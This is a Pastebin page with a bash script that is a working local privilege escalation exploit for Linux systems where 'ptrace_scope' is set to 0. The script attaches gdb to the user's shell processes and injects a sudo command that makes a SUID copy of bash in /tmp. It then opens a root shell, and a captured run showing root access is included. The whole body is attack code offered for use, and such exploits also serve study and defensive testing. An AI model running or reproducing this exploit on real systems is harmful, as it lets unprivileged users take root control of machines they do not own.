SHARE
TWEET

EDB-ID-46989.sh

TVT618 Jun 17th, 2019 358 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env bash
  2.  
  3. #######################################################
  4. #                                                     #
  5. #           'ptrace_scope' misconfiguration           #
  6. #              Local Privilege Escalation             #
  7. #                                                     #
  8. #######################################################
  9.  
  10. # Affected operating systems (TESTED):
  11. #   Parrot Home/Workstation    4.6 (Latest Version)
  12. #       Parrot Security            4.6 (Latest Version)
  13. #   CentOS / RedHat            7.6 (Latest Version)
  14. #   Kali Linux              2018.4 (Latest Version)
  15.  
  16. # Authors: Marcelo Vazquez  (s4vitar)
  17. #      Victor Lasa       (vowkin)
  18.  
  19. #┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
  20. #└──╼ $./exploit.sh
  21. #
  22. #[*] Checking if 'ptrace_scope' is set to 0... [√]
  23. #[*] Checking if 'GDB' is installed...         [√]
  24. #[*] System seems vulnerable!                  [√]
  25. #
  26. #[*] Starting attack...
  27. #[*] PID -> sh
  28. #[*] Path 824: /home/s4vitar
  29. #[*] PID -> bash
  30. #[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
  31. #[*] PID -> sh
  32. #[*] Path
  33. #[*] PID -> sh
  34. #[*] Path
  35. #[*] PID -> sh
  36. #[*] Path
  37. #[*] PID -> sh
  38. #[*] Path
  39. #[*] PID -> bash
  40. #[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
  41. #[*] PID -> bash
  42. #[*] Path 1842: /home/s4vitar
  43. #[*] PID -> bash
  44. #[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
  45. #[*] PID -> bash
  46. #[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
  47. #
  48. #[*] Cleaning up...                            [√]
  49. #[*] Spawning root shell...                    [√]
  50. #
  51. #bash-4.4# whoami
  52. #root
  53. #bash-4.4# id
  54. #uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
  55. #bash-4.4#
  56.  
  57.  
  58. function startAttack(){
  59.   tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
  60.     if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
  61.       echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
  62.       echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
  63.     fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
  64.     done
  65.  
  66.     if [ -f /tmp/bash ]; then
  67.       /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
  68.                       rm /tmp/bash
  69.                       echo -e "                            [√]"
  70.                       echo -ne "[*] Spawning root shell..."
  71.                       echo -e "                    [√]\n"
  72.                       tput cnorm && bash -p'
  73.     else
  74.       echo -e "\n[*] Could not copy SUID to /tmp/bash          [✗]"
  75.     fi
  76. }
  77.  
  78. echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
  79. if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
  80.   echo " [√]"
  81.   echo -ne "[*] Checking if 'GDB' is installed..."
  82.   if command -v gdb >/dev/null 2>&1; then
  83.     echo -e "         [√]"
  84.     echo -e "[*] System seems vulnerable!                  [√]\n"
  85.     echo -e "[*] Starting attack..."
  86.  
  87.     startAttack
  88.  
  89.   else
  90.     echo "         [✗]"
  91.     echo "[*] System is NOT vulnerable :(               [✗]"
  92.   fi
  93. else
  94.   echo " [✗]"
  95.   echo "[*] System is NOT vulnerable :(               [✗]"
  96. fi; tput cnorm
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top